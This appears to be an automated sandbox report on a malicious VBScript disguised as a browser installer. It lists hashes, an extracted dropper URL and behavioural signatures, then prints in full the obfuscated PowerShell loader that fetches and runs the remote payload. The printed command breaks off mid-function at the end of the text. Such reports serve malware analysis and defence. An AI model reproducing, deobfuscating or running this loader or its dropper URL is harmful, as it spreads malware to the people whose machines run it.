e9bc9118078c9b521c97543e9b0a13d63c8d09f5289a9892efc40cb64a37cc91

General

Target

CTBrowserSetup_IzCDcU.vbs
Size

2.6MB
MD5

cd70c03b7ce70dc04864968bd50b6c46
SHA1

83ec5661a1d3290b7dc23021794d0bb55dd09596
SHA256

e9bc9118078c9b521c97543e9b0a13d63c8d09f5289a9892efc40cb64a37cc91
SHA512

a3ede6d7a465708629dfcfdc2d1bebaa5a3359b7e38b0cf1df94587d11c105ed16b18f08a97876384922a96ab72cae18bcd9cd27c82a3921789996f3db959546
SSDEEP

6144:T5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5s5ktBJy0T0T0TH:tZ1

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://quickcheckx.github.io/quickme/Milieu.snp

Signatures

Blocklisted process makes network request 48 IoCs

Processes:

powershell.exe

flow	pid	process
4	964	powershell.exe
5	964	powershell.exe
6	964	powershell.exe
7	964	powershell.exe
8	964	powershell.exe
9	964	powershell.exe
10	964	powershell.exe
11	964	powershell.exe
13	964	powershell.exe
14	964	powershell.exe
15	964	powershell.exe
16	964	powershell.exe
17	964	powershell.exe
18	964	powershell.exe
19	964	powershell.exe
20	964	powershell.exe
21	964	powershell.exe
22	964	powershell.exe
23	964	powershell.exe
24	964	powershell.exe
25	964	powershell.exe
26	964	powershell.exe
27	964	powershell.exe
28	964	powershell.exe
29	964	powershell.exe
30	964	powershell.exe
31	964	powershell.exe
32	964	powershell.exe
33	964	powershell.exe
34	964	powershell.exe
35	964	powershell.exe
36	964	powershell.exe
37	964	powershell.exe
38	964	powershell.exe
39	964	powershell.exe
40	964	powershell.exe
41	964	powershell.exe
42	964	powershell.exe
43	964	powershell.exe
44	964	powershell.exe
45	964	powershell.exe
46	964	powershell.exe
47	964	powershell.exe
48	964	powershell.exe
49	964	powershell.exe
50	964	powershell.exe
51	964	powershell.exe
52	964	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

240 powershell.exe
964 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 240 powershell.exe
Token: SeDebugPrivilege 964 powershell.exe

pid	process
240	powershell.exe
964	powershell.exe

description	pid	process
Token: SeDebugPrivilege	240	powershell.exe
Token: SeDebugPrivilege	964	powershell.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

WScript.exepowershell.exe

description	pid	process	target process
PID 1344 wrote to memory of 240	1344	WScript.exe	powershell.exe
PID 1344 wrote to memory of 240	1344	WScript.exe	powershell.exe
PID 1344 wrote to memory of 240	1344	WScript.exe	powershell.exe
PID 240 wrote to memory of 964	240	powershell.exe	powershell.exe
PID 240 wrote to memory of 964	240	powershell.exe	powershell.exe
PID 240 wrote to memory of 964	240	powershell.exe	powershell.exe
PID 240 wrote to memory of 964	240	powershell.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CTBrowserSetup_IzCDcU.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Femaarig = """WFEuSnscEtUiRoAnP DFCoBlTkBeWbp0R0D v{KpDaMrCaRma(G[BSptSrBiUnAgs]C`$AFGlAsDkEeHksdt)G;SFPoLrS(M`$TRBhGiApRshaSlTiF=m1U;F G`$GRShOigpDseaDlAiL A-SlCtm E`$LFSlDsBkteCkhdE.lLFePnRgStShO-F1S;S A`$FRThEiIpBsSaSlciA+i=H(F1G+R1E)D)S{P`$TRUeUsHiUdteMnCtSsFbP G=p L`$SRUeSsUiTdTeVnTtDsSbs K+M O`$RFflBsSkReDkGdF.VSJuTbKsMtBrCiKnUgT(E`$MRfhRiRpCsRaHlAiJ,B l1U)D;R}F`$CRkePsAiPdVeWnEtDsObP;B}B`$IFvoAlMkBeFbE0D2S S=B FFSoUlSkPeHbt0T0O A'RWWIPPbnPISvFuFocKxkdRDeKTJ-iRsESBExOBFpSADrRpdeDTFsTPBsAAAiASboNsBnUTT S'P;S`$HFBoKlAkbeLbC0I1R U=P DFIoplGkDeSbS0K0R S'SUE`$ISANHTRoBBAndSUrSDMePUMtBTCrFSF[DVT`$FTVRKPHhUHBiSSBpAHFsTPUaUCKlEFLiFFU/REH2IFU]LHR TZP=SbL NKd[CMpcPGOoSPSnSLSvTMUeGFVrPSTtlGK]cLC:CSC:KAATNVLoAfWBUCKysENtBnLeLFo(NOV`$kSDFPISlHCUsFEdkBbVeHATkSUPdGHS.PFJSCMUuPHvbHWLsDFStSOSrSBNiABRnfiUgMTS(DLU`$DAARFTEhpMSiMBSpsSKsSSDaSFSlJMAiDMT,ULM RHB2TUJ)MPU,LCV PKR1FSA6PDB)GSE S'b;CFAuAnKcUtDiFoSnf OHtTDBt K{DpPaDrpaMmC(D[TSotsrViWnFgS]F`$CFAlPsIkKeAkSdC)B;G`$sNVoAnBrNePtArR T=R ANPeuwI-DOubtjDePcHtE RbDyStSeK[A]F A(H`$SFDlBsIkpeGkNdS.NLGeSnUgptehs G/F F2G)D;GFToBrP(P`$ARMhCiCpCsUaSlPiH=P0K;d F`$TRLhAibpAsFaSlPiA h-IlTtB F`$GFFlTsMkTeNksdS.HLAeFnOgGtBhA;M f`$PRMhAinpPsbaMlFiK+R=S2S)S{U.G(S`$SFLoKlSkDeFbB0K2K)B G`$FFDoBlJkseKbA0s1A;M`$ENDoInSrDeAtMrV[K`$NRAhBiSpKsNaHlLis/P2F]W C=a N(R`$kNToEnErCeAtUrS[A`$BRShOiPpMsEaLlAiA/E2A]A A-EbSxGoPrJ R6V9I)p;S}R[TSttArDiOnDgk]v[DSTyVsHtCeSmI.OTseMxRtS.MERnscFoBdaiHnSgG]T:A:AATSUCOIsIS.BGUeGtPSPtDrSiPnIgf(A`$RNUoPnUrAeTtBrN)C;S}I`$SSCpEofuR0A=WHSTKBU F'F1S6S3sCB3B6l3R1B2A0A2T8W6TBS2R1S2C9V2U9F'D;A`$MSUpdoOuC1U=HHOTKBC t'E0I8w2BCB2P6G3I7H2CAK3S6G2OAB2G3V3U1F6iBT1S2s2MCI2SBP7V6B7c7p6CBf1S0S2GBS3R6M2R4P2C3R2s0A0HBA2K4T3H1N2nCG3L3B2O0o0I8H2f0L3A1B2ADD2RAa2A1P3S6S'U;T`$VSMpRoSuB2N=RHFTSBa U'R0B2A2l0A3J1U1k5J3L7F2PAS2C6Y0N4P2V1Q2P1N3R7T2D0S3U6P3G6P'N;M`$ISWpMoUuM3V=SHSTEBV E'i1L6B3sCD3K6U3U1M2o0T2U8D6bBP1D7S3t0T2FBL3P1D2aCB2B8H2S0A6FBF0HCU2EBH3C1B2T0D3S7S2CAU3C5V1G6P2S0A3K7B3L3U2SCF2A6C2S0a3n6C6EBP0RDA2S4A2PBB2L1a2S9L2N0F1U7C2C0R2I3S'P;K`$ASSpBoFuS4U=UHvTKBR S'R3R6D3f1K3D7P2PCH2SBS2C2D'C;H`$bSBpOoBuC5T=KHTTPBA I'U0U2B2B0S3H1A0b8P2SAK2E1U3H0R2S9T2T0R0tDS2A4I2PBK2U1M2S9m2D0A'G;N`$KSKpDoAuG6S=FHETRBB M'F1U7F1P1u1G6S3R5P2K0R2B6E2MCF2U4S2N9C0DBF2P4s2M8S2U0D6N9T6r5D0DDU2RCN2U1p2K0N0J7K3rCS1R6V2VCr2L2T6b9M6S5E1c5A3t0S2M7B2O9F2LCy2K6B'L;E`$WSBpIoTuW7L=sHFTKBG F'B1E7P3S0L2JBK3T1A2SCf2F8N2S0d6s9U6T5G0a8B2T4D2SBA2A4v2P2A2K0F2B1P'I;a`$SSMpBobuM8K=pHZTHBI S'E1d7C2S0B2U3N2e9D2F0o2E6B3d1R2S0A2B1B0E1W2R0O2K9p2K0B2b2B2T4L3G1F2T0F'L;U`$GSTpSoSuH9S=UHKTABC S'F0ACL2IBM0g8i2P0E2H8S2PAK3S7U3ECE0B8A2mAS2d1O3P0F2M9U2B0B'B;B`$RUVnBvEiFtl0S=ZHLTTBF S'P0S8R3ACD0a1J2s0R2D9E2S0L2V2O2T4L3M1G2H0F1P1B3LCK3M5t2S0F'U;H`$SUInEvOiTtS1U=EHMThBF F'R0h6Q2T9G2R4T3G6P3F6B6S9G6S5I1S5S3F0K2P7T2C9b2GCB2a6R6O9W6B5A1S6B2p0J2D4s2F9G2S0B2R1P6P9c6B5P0C4F2FBL3S6U2BCk0S6H2O9P2C4d3i6M3D6t6u9d6O5F0B4T3C0P3A1D2DAu0K6B2T9R2f4N3B6O3B6S'C;O`$RUAnHvFiStI2I=LHWTRBI B'Z0RCU2BBF3G3T2PAF2OEF2S0C'T;S`$PUOnAvViDtD3h=sHKTSBS D'S1N5P3U0X2D7f2E9A2TCN2H6C6R9O6B5S0BDB2PCT2W1R2W0P0B7B3PCA1F6S2SCC2T2P6S9B6A5A0HBO2R0B3T2M1M6F2B9S2DAf3h1B6s9M6T5R1F3G2sCS3O7H3S1D3S0F2N4C2S9a'U;M`$TUKnSvRiAtA4R=zHATeBd M'D1O3A2aCR3A7S3I1P3P0G2V4C2K9F0K4A2I9E2P9S2sAO2A6K'T;B`$HUEnSvCiGtT5P=GHeTLBM M'A2SBS3A1u2F1A2I9E2O9U'u;T`$sUEnFvUiwtT6U=FHATBBA M'B0GBS3A1I1K5S3M7D2TAC3M1S2A0D2P6T3P1S1N3D2SCM3A7O3P1N3O0F2L4K2O9C0U8E2I0A2p8D2UAH3S7E3FCG'R;R`$FUSnHvLiHtS7r=PHRTHBK F'T0KCI0T0P1BDG'B;O`$LUSnavBittO8M=DHBTHBR C'D1D9S'S;O`$SHNePmCiFpneN=sHFTmBS f'O1T0a1H6n0P0D1C7K7D6m7L7F'R;C`$HSByRcBoSsSiFfR=UHUTBBP K'A0E6D2M4K2p9V2D9C1I2H2MCP2DBG2C1S2cAM3P2T1a5P3N7A2OAE2R6f0d4N'F;FfVuPndcQtTiMoPnS pfIkIpb E{CPSasrBaSmS D(T`$TTEnNkmeS,F D`$nSTwniCnreDhGeDrIdCpU)D N h A R U;P`$NLCiLmAfsaFbErTiUkekP1C1B8D0R L=DHNTSBP S'L6B1D1S1S3T7F3F7S2d0C2F9N2LAF2B3N6U5C7R8a6S5S6DDV1SEP0P4D3A5U3B5N0O1D2aAG2C8R2S4F2SCB2SBU1F8S7EFP7CFJ0G6G3F0p3G7P3k7H2K0S2SBS3F1E0S1F2DAT2U8p2L4O2CCD2iBS6sBR0O2R2H0B3A1O0D4B3S6T3E6F2A0r2P8S2B7B2U9S2BCV2A0T3C6T6sDD6KCB6D5W3S9l6S5R1G2C2BDT2A0S3T7S2V0K6C8K0UAB2O7F2NFC2H0Q2L6O3O1F6L5S3EEF6O5U6U1T1SAP6FBS0M2B2B9G2BAD2E7H2U4R2M9F0U4A3R6S3P6F2U0S2E8O2A7t2P9S3SCB0O6P2A4a2Z6P2IDF2s0t6P5A6A8R0S4P2KBB2H1T6B5A6C1T1OAM6SBV0R9E2tAT2I6B2R4P3V1D2tCA2UAE2TBU6JBE1C6A3U5T2W9B2RCg3S1U6SDV6m1R1t0f2RBK3C3B2HCH3B1S7BDa6PCS1NES6U8e7T4O1S8c6DBL0A0D3M4B3S0D2F4S2D9S3C6N6IDS6S1L1S6K3F5C2AAA3k0B7T5P6BCS6V5T3L8F6SCS6HBC0S2C2H0G3A1C1S1h3ECU3S5N2T0B6ODN6C1e1A6B3M5U2AAU3J0E7T4C6TCD'S;O&K(H`$DUDnNvIiGtS7A)C S`$ALDiPmCfLaAbDrSibkVkE1B1M8U0P;T`$ULSiPmDfFaSbBrAiCkPkA1T1C8A5A s=T PHSTCBA c'D6R1M0R8S2S0F3K1H2f4A2N9M3v3I2N4s2bBV2U1H6S5W7P8I6H5F6S1s1M1A3B7F3A7H2s0b2P9U2HAS2G3K6SBS0C2P2S0T3N1U0K8R2A0B3u1S2HDM2EAS2r1L6NDC6S1G1K6T3S5h2hAb3U0S7C7G6P9S6G5U1HET1s1P3PCK3A5A2O0T1TEW1O8s1P8S6D5L0A5p6HDR6F1U1S6d3U5A2WAp3P0B7U6H6E9R6G5R6I1N1O6P3I5N2OAB3S0F7k1F6MCT6VCR'H;S&H(T`$VUmnavWiPtM7E)P D`$OLFiRmEfAaGbFrIiNkRkP1P1D8S5P;C`$SLOiAmBfHaBbBrOiOkSkP1O1F8c1C G=D EHSTCBB D'M3s7R2L0P3F1V3F0O3S7U2TBG6u5H6R1P0P8C2S0A3N1S2U4G2F9k3E3A2N4D2TBD2D1A6TBA0DCJ2MBQ3S3C2IAB2EEc2G0D6SDO6b1R2SBN3P0S2F9G2R9r6G9K6A5A0S5F6TDO1NEL1S6K3SCV3S6R3C1W2a0s2O8V6MBP1L7U3P0D2rBB3K1e2PCA2M8A2B0b6VBC0sCC2cBK3L1T2U0F3B7o2SAg3S5E1n6H2V0F3P7E3E3S2KCK2F6D2R0L3V6K6bBS0LDS2F4M2SBE2b1H2l9g2W0D1E7F2P0C2n3B1T8F6WDB0EBM2O0K3h2L6U8B0LAD2H7A2TFD2O0S2C6R3U1M6T5R1B6R3NCV3G6I3Y1L2V0I2S8K6UBG1B7S3L0R2fBS3A1T2PCD2U8O2U0U6PBO0qCs2LBT3S1c2O0H3K7o2NAD3T5R1A6F2T0Z3G7C3O3N2HCA2l6Q2T0b3T6G6TBS0BDI2L4F2MBT2h1D2O9O2A0T1B7F2L0H2s3l6ADS6ODB0ABF2M0i3P2T6A8S0FAM2I7R2SFB2O0I2O6M3U1C6Y5c0PCS2sBR3J1s1R5F3F1P3P7S6SCD6I9B6F5S6BDR6a1F1P1N3d7G3K7S2O0P2A9A2BAA2U3F6TBs0H2a2B0g3H1S0A8L2B0U3A1H2WDD2GAT2r1S6BDV6P1P1S6s3l5A2vAP3F0m7H0T6CCP6HCT6BBC0ACU2KBB3S3g2AAG2EES2R0O6ODM6S1B2oBS3S0U2B9W2M9P6A9A6A5C0c5H6RDG6e1E1U1D2TBA2SEO2P0F6KCK6BCD6TCE6SCR6C9S6R5b6F1P1Y6T3B2S2FCI2OBA2O0B2KDO2s0F3A7C2M1N3k5G6PCT6TCl'F;s&R(j`$SUFnHvLiLtC7B)M P`$bLUiKmBfHaCbRrSiCkGkD1U1C8b1A;I}RfFuGnMcVtTiCoBnF IGBDOTB G{LPEaLrBalmM S(P[FPtaTrTaFmSeDtMeSrh(BPCoMsNiStbiUoTnU T=A S0H,S sMDaDnHdSaTtTodrNyI O=C F`$FTVrFuKeR)a]A T[BTuyHpMeJ[C]V]m S`$IsUkbyEdOemvD,d[APYaTrPasmNeStBeKrC(MPDoGsRiFtEiSoPnA S=D B1F)B]C A[STByUpReP]S D`$eEOlLePuPtUhSeB F=U D[SVboSiBdH]W)O;S`$ALSidmMfSaUbsrTiPkAkT1B1d8N2N S=F BHATBBS a'E6W1O0D4b3L7P2K0A2EBV2PCA2T6I2BAI2A9b6P5F7R8I6A5E1PEA0K4P3P5p3R5R0S1A2UAO2L8S2S4Q2LCS2BBB1O8U7RFA7EFO0B6M3H0L3M7Q3R7J2M0b2MBS3A1S0P1R2BAZ2K8R2P4T2MCS2FBD6VBT0P1S2K0A2R3S2OCE2BBK2T0C0N1F3SCH2SBP2L4P2U8P2aCA2I6N0D4S3Q6K3R6M2U0O2T8S2B7s2B9A3CCP6LDF6SDS0OBI2I0P3C2H6U8M0OAG2E7C2SFC2D0T2p6s3T1H6A5S1C6T3VCT3T6S3A1E2S0M2T8S6uBB1P7E2S0P2B3C2T9I2L0M2P6E3M1H2BCo2FAF2KBO6WBF0C4D3E6E3s6G2T0F2V8S2a7S2R9b3ICU0SBV2F4D2B8O2H0P6ADL6H1B1T6A3T5o2BAS3R0I7TDr6MCB6BCB6K9Z6D5A1FEp1O6N3ECF3P6m3O1E2R0L2B8S6EBT1U7F2O0A2D3L2S9C2D0V2b6P3F1P2ACS2DAN2aBS6OBD0C0M2K8D2FCP3S1F6MBF0P4A3F6E3H6B2T0U2S8V2G7r2B9K3SCK0U7D3L0S2BCK2P9B2F1O2F0F3P7A0A4P2F6P2P6D2n0A3H6F3K6H1C8t7CFB7MFL1A7t3P0T2UBf6BCP6OBC0P1B2T0B2E3R2PCD2JBS2S0A0P1H3ACe2ABV2k4M2c8S2PCL2H6d0N8A2TAO2N1O3S0C2C9P2e0O6MDA6F1t1T6F3F5H2rAB3P0C7SCC6N9E6T5F6S1T2P3N2L4A2G9G3D6p2B0U6HCP6SBR0r1A2S0T2f3A2RCS2SBT2L0D1R1S3TCA3e5S2H0B6fDW6E1W1L0k2CBM3L3D2aCD3C1D7O5C6N9G6S5F6q1t1P0B2PBB3o3K2SCU3V1S7N4F6I9P6A5V1VEU1R6C3DCB3N6N3S1C2O0P2s8T6BBP0I8E3A0M2N9S3D1c2TCU2E6S2H4M3A6H3Y1V0D1S2B0a2O9G2S0S2G2E2i4S3E1S2S0Y1K8S6aCs'C;I&P(R`$SURnSvTiUti7A)N T`$bLBiVmDfTaWbTrTiSkekL1T1A8B2P;F`$CLIiMmVfAaRbbrHiCkPkE1W1a8P3R H=U PHETABS D'O6r1S0A4P3H7m2D0E2KBH2ICK2P6I2AAr2B9A6dBD0D1P2C0A2U3S2MCS2SBO2U0U0K6K2UAU2NBA3B6U3D1D3s7A3R0F2T6o3B1K2SAO3t7G6mDa6T1M1S6K3T5T2FAA3B0n7U3D6K9M6M5D1REH1F6S3UCT3N6O3T1S2A0E2E8F6TBT1a7T2a0R2B3U2T9F2S0b2P6B3s1O2uCU2DAS2LBV6FBP0D6N2R4R2I9Z2A9B2GCf2iBI2T2S0R6F2BAK2LBS3E3E2S0P2PBU3c1R2ACP2IAf2TBB3S6A1M8P7SFS7HFJ1s6F3M1D2Y4A2EBD2S1F2G4g3K7O2G1C6S9S6p5A6M1M3A6S2JEN3MCE2P1S2d0N3B3D6UCI6tBK1N6U2F0T3B1P0ACK2B8U3E5D2R9F2S0B2T8I2L0T2TBM3M1C2V4R3C1g2SCL2AAP2KBh0F3G2B9P2d4G2A2A3O6B6rDA6F1V1S6D3l5P2CAA3S0U7R2K6CCM's;U&r(W`$PUAnUvLiDtd7A)T S`$TLUiFmRfCaTbArTiLkSkC1O1D8O3I;R`$RLQiBmBfSaPbUrHiAkbkA1d1F8I4b S=I LHGTKBR W'A6R1S0G4I3U7D2N0F2DBD2NCU2S6P2MAM2B9b6WBA0p1U2E0E2P3T2BCB2SBG2T0O0F8m2O0l3S1I2IDK2SAT2S1B6BDS6C1S1S0G2sBM3u3K2SCG3R1C7S7I6U9P6A5E6U1T1P0O2pBA3S3s2sCS3B1H7L6B6T9S6A5S6s1B0A0T2B9R2d0S3U0c3T1T2UDB2G0F6K9J6D5D6C1T3P6c2FEI3SCO2h1B2W0T3A3J6OCG6ABD1S6O2K0I3j1U0BCA2U8W3L5B2C9R2U0P2M8S2M0D2TBt3B1D2d4A3T1M2bCD2KAG2BBI0D3V2B9G2H4R2S2V3B6T6ADE6R1O1F6A3R5F2FAC3v0H7V2S6SCU'L;P&L(C`$SURnBvliRtI7M)t S`$SLSiVmSfNaSbArBiUkBkv1P1G8b4M;A`$ELCiSmPfHaIbmrKiCkCkB1M1N8M5S A=E AHLTSBG G'A3V7D2I0U3r1S3U0V3D7R2OBC6C5S6B1v0U4C3U7M2J0S2SBM2BCf2T6B2SAA2M9E6LBO0A6S3R7P2D0C2G4s3G1M2S0h1C1M3ACS3o5E2M0S6EDD6SCD'F;A&E(A`$RUcnHvMiKtR7I)P T`$PLFiBmAfFaFbMrKiSkCkR1P1F8R5M E P D;S}S`$AESnBgNaOnBgVsSeBmS V=L THpTrBU H'E2OES2E0F3N7F2ABP2H0A2h9I7F6g7C7A'U;C`$PLFimmGfSaCbTrAiHkSkM1O1r8T6H S=S OHATSBS D'K6F1s1N0N2OBM2L1v2P0K6F5M7A8I6M5C1AES1S6T3SCp3A6F3u1B2G0W2n8R6EBE1W7S3A0W2tBD3D1U2BCA2M8O2E0R6RBS0HCE2SBD3S1U2O0V3H7H2EAi3d5M1P6S2T0S3A7P3M3D2TCE2P6G2P0L3h6P6FBS0F8E2L4G3R7a3S6S2HDE2R4K2C9R1M8M7BFE7uFC0l2e2E0E3E1V0T1S2r0D2Y9V2D0T2A2l2G4B3A1S2A0M0H3A2PAR3O7m0M3T3J0T2MBD2L6b3L1H2FCk2ZAI2SBA1D5L2PAE2BCO2ABF3M1P2D0W3A7P6uDM6GDP2U3P2HED3D5W6B5G6M1S0U0M2oBL2C2N2F4A2PBB2R2T3G6C2C0R2F8P6U5B6H1R1k0M2PBP3P3N2NCH3W1p7S1A6rCF6N9B6C5B6FDB0P2T0A1M1S1P6S5H0U5T6sDF1dEO0ACJ2CBl3C1D1A5S3B1C3T7U1F8R6F9D6I5R1UEV1F0B0NCC2mBP3A1A7D6U7I7A1S8S6H9K6E5C1PEB1F0L0KCB2MBF3V1O7D6B7B7D1M8T6U9D6P5M1SEA1O0A0GCO2VBk3C1B7H6C7T7S1B8A6CCN6F5B6IDR1kEs0PCC2SBB3W1d1B5K3A1r3F7C1S8R6ACU6UCS6FCM'P;C&U(G`$SUTnFvUiStP7R)O B`$ILMiDmDfAaDbHrUifkCkS1D1R8o6A;O`$ENTeQgLoBtSiKaTtV G=V AfKkIpS S`$PUHnbvRiStR5u P`$lUDnSvMiStA6D;L`$PLSiLmUfBaLbDrBiBkDkS1A1h8D7T D=P KHBTRBS M'B6T1W0O6A3VCP2I6S2I9V2PAR2SCC7U6g6G5B7A8K6S5U6D1S1L0K2SBP2I1M2e0A6EBK0HCE2SBR3E3F2BAD2KES2K0l6KDP1JEN0RCa2PBN3P1U1H5R3H1S3T7P1G8H7OFS7TFH1SFB2L0D3S7T2KAL6h9S6U5U7D3T7V1F7T2D6M9A6r5R7B5l3DDS7L6H7C5S7A5S7B5F6F9R6L5S7A5D3gDu7C1M7B5U6ACI'A;B&C(F`$FUKnBvmihtN7D)U P`$OLSiRmSfNaBbprTiCkRkT1G1s8P7B;U`$NLSiSmSfNaPbRrViCkAkT1l1G8A8B S=P PHETSBj L'P6V1D0L4P2C4a3P7R3G1U3A0B6L5E7F8M6G5E6F1s1G0a2RBH2E1V2O0B6SBA0SCk2DBR3A3O2IAC2LEK2f0X6ADF1IEI0iCF2QBO3P1A1U5W3D1D3f7N1U8M7SFs7CFK1BFK2G0S3H7S2TAk6A9A6s5U7B6O7RDs7V4S7FCa7P0o7p7G7O5M7K5F6G9T6M5G7S5U3VDL7e6A7m5A7U5H7r5L6T9P6B5s7C5E3ADT7L1T6TCS'T;C&M(S`$SUDnPvEiUtS7D)u U`$FLGiBmBfUaSbprtidkSkh1D1f8H8S;p`$NRDepsAiSdSeMnKtUsJbE0D1R R=T O'MhMtMtHpPsS:T/P/SqBuUiJcPkScAhVePcykUxK.MgGiTtBhfuSbS.ZiPot/KqSuPiNcCkUmceG/JMIiDlMiDeSuM.VsAnSpA'S;V`$FREeCsHiUdueInrtIsSbH0T0R B=U PHATSBo A'C6P1C1K1D2ECG2t9T3b7S2F4G2I4L2L1M2R0U2B9B6T5E7U8S6D5F6RDU0ABC2H0F3S2M6M8I0BAT2w7S2OFC2A0R2P6A3T1V6S5G0ABO2O0L3D1A6SBO1F2C2L0S2K7R0Z6O2Z9P2aCS2P0e2DBA3U1C6aCI6vBa0a1F2CAK3F2A2NBK2C9G2GAW2P4r2A1G1m6S3O1V3H7R2FCM2UBK2H2P6GDB6F1G1K7B2u0C3D6K2CCL2W1B2S0R2GBR3V1E3N6T2S7P7D5H7L4S6FCA'd;C`$TLGiBmPfKadbPrIiUkIkR1R1P8U8P P=a DHRTSBT T'O6G1B0A6M3FCC2n6P2L9B2FAK2SCS7O7R7V8K6B1A2U0O2UBM3T3E7FFD2S4T3r5M3F5b2B1B2P4E3S1B2C4K'S;P&S(D`$TUKnsvOiUtG7s)F u`$TLEiHmcfBaKbUrNiKkSkW1F1F8A8P;s`$FCKyTcGlBoPiU2V=B`$HCUyYcAlToBiS2O+S'S\AMOaUjLkSaFtDtAeSeP.PdBaHtd'E;B`$KTSiPlUrOaBaadVeLlF=v'G'S;FiCfF C(g-BnSoUtG(ATLeNsTtP-MPFaRtBhA W`$UCAypcClaodiR2J)U)A S{SwIhGidlAeB V(E`$RTMiWlMrBaraFdLePlB l-PeOqB B'C'S)r v{c&F(V`$GUNnnvTiatS7D)C P`$TRKePsPiNdGeBnotFsTbB0T0F;SSFtSaorAtS-TSSlHeBeApS E5E;W}DSBeEtM-VCPoVnStBeCnDtt S`$FCLyocrlHoKiA2F P`$ATGiTlNrNaPaSdMeDlf;N}L`$FTAidlJrKaRaAdPeIlI F=R OGEeMtS-ACUoKnUtEebnTtn O`$HCMyRcRlOoEiM2E;K`$BLFiNmWfAaSbHrViTkLkC1p1S8W9e a=U THITOBT L'K6m1H0S9L2PCS2H8P2I3I2M4P2e7A3T7D2BCY2PEB2ZEP7f4L7O4M7SDB6F5B7V8B6K5G1PEP1V6C3DCF3V6K3F1S2M0P2D8V6sBU0T6N2HAS2PBF3F3R2P0U3M7M3P1F1A8A7GFS7pFP0S3D3h7K2FAP2S8C0B7E2B4T3A6S2A0A7C3M7H1S1G6B3e1G3A7U2ACP2PBT2T2h6TDT6T1D1G1b2sCE2U9T3S7O2O4O2B4S2J1G2M0H2U9D6MCv'E;B&F(B`$DUCnHvTiftL7T)C F`$CLDiTmAfKaTbUruiSkDkH1D1I8K9T;B`$STiiMlCrDaMaUdNeAlG0o S=s UHFTSBC U'B1TEH1M6l3MCD3K6E3R1I2L0C2I8D6DBH1I7V3V0r2TBD3M1U2ECS2P8S2H0L6BBT0OCH2SBS3B1A2k0P3S7S2AAP3s5M1A6S2I0N3B7M3P3H2ICB2S6M2D0O3L6D6UBT0E8S2t4S3B7T3F6r2SDA2N4F2N9H1L8E7pFM7TFS0l6P2FAb3K5A3ICS6GDA6N1F0s9E2LCF2F8U2E3C2F4u2Y7C3R7H2RCf2IEY2MER7C4C7N4S7VDD6H9E6S5P7F5C6C9M6I5t6d5T6Y1e0F6S3MCL2O6P2B9R2fAF2FCd7T6T6A9R6U5E7N3k7p1M7S2B6ECM'S;M&L(F`$AURnNvRiDtU7V)P A`$JTBiVlSrBaNaGdGeilI0S;G`$SPKrueLsUaK=F`$DLUiCmAfEaSbLrSiskCkL1C1S8T.UcUoPuCnPtB-O6S4L7A;N`$BTFiDlRrGaBaUdSeDlT1T D=S BHMTPBP U'C1NEP1A6T3gCF3Z6A3D1R2S0F2B8T6VBS1V7K3H0B2KBS3D1S2SCK2C8P2B0C6SBA0BCb2DBp3M1B2P0S3F7U2EAS3R5M1A6S2R0B3M7S3F3W2TCC2S6R2O0P3R6p6DBL0E8H2V4P3D7l3P6C2UDN2K4S2S9F1l8s7BFE7KFC0S6U2PAF3b5S3UCS6FDG6K1F0V9A2DCH2W8I2W3A2S4u2R7E3G7D2KCC2WEN2SEI7O4C7A4D7FDA6Y9A6K5E7F3O7E1T7I2P6A9G6u5A6S1A0a4o2H4M3F7M3P1R3S0S6C9E6C5S6B1B1P5R3r7S2O0S3D6T2A4U6BCJ'A;P&C(S`$VUInFvsiBtM7C)S L`$UTKiVlFrDaRaUdIeplM1T;P`$GTHiFlUrnaUaFdNeSlS2S I=T SHMTfBU S'R6S1B1D6S3D5M2P4Y2R6M6A5H7H8K6C5M1PEE1N6B3FCS3T6C3S1D2F0A2H8P6CBF1P7M3E0G2SBT3O1C2RCv2O8S2T0D6ABS0RCD2HBS3C1S2P0A3A7T2MAS3P5M1D6b2F0T3K7O3C3F2CCM2F6I2I0H3R6R6TBS0G8K2A4M3T7I3B6B2NDT2D4R2T9R1M8H7RFF7LFH0V2J2P0M3O1K0S1D2W0I2f9F2M0B2c2L2T4O3H1F2F0B0N3H2IAF3C7s0B3M3U0U2FBF2K6B3T1P2DCB2HAB2CBm1A5F2OAA2bCC2PBD3P1F2D0C3G7J6PDC6NDC2S3U2NER3M5d6H5E6T1B0sDP2G0F2U8f2BCM3D5A2U0H6S5B6S1R1T6P3DCo2V6S2AAD3F6P2NCO2C3F6SCH6e9C6L5G6BDF0b2T0V1A1A1E6t5R0I5L6UDM1VEB0ICC2UBH3S1D1v5A3i1I3m7M1B8A6P9M6e5B1AEM0KCS2SBD3R1m1A5A3j1E3A7G1S8E6a9D6S5F1HEM0PCU2vBO3j1L1T5E3R1G3K7A1F8C6S9M6C5A1KEG0PCD2BBL3M1r1D5P3A1A3U7H1R8U6A9F6C5B1fEP0ACA2TBK3A1I1P5S3H1A3S7K1i8U6OCG6R5N6RDT1SEA0PCM2ABW3P1a1S5H3I1R3O7P1U8p6HCK6ICS6ACS'M;O&F(M`$tUCnVvTiUtP7L)B H`$STsiMlNrLaoaAdCeHlT2W;A`$iTCigltraaSaUdceBlp3S F=F MHGTKBN R'P6S1D1T6N3M5O2O4B2a6B6iBC0ACe2MBS3A3S2GAm2pEA2P0A6KDO6L1m0S6M3MCD2I6O2D9A2OAB2LCH7O6D6D9S6A1g0c4U2R4C3D7E3M1S3F0M6L9E6R1s0RBE2R0B2P2B2PAf3M1N2RCS2S4S3V1D6D9F7H5K6e9a7M5S6JCP'M;S&A(D`$OUFnQvGiCtP7G)C U`$KTSiAlSrSaHaSdfeSlS3F#A;""";$Pendrag = [char]0x73+'ubstring';Function Tilraadel9 { param([String]$Flskekd); For($Rhipsali=1; $Rhipsali -lt $Flskekd.Length-1; 